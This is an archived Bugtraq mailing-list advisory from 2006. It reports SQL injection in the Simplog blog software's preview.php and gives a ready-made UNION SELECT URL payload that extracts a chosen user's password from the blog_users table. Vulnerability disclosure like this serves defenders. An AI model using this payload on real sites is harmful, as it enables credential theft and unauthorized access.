[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SQL Injection simplog

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SQL Injection simplog
From: navairum@xxxxxxxxx
Date: 19 Oct 2006 19:27:41 -0000

Softare: Simplog www.simplog.org
version:0.9.3.1 (i assume others as well)

There are a few sql injections available with this software.  This one is in 
preview.php


eg.

http://site/preview.php?blogid=2&adm=tem&tid=-1%20union%20select%20password%20from%20blog_users%20where%20name='[insert
 username here]'

Prev by Date: UltraCMS 0.9 sql injection
Next by Date: KICS CMS sql injection
Previous by thread: UltraCMS 0.9 sql injection
Next by thread: KICS CMS sql injection
Index(es):
- Date
- Thread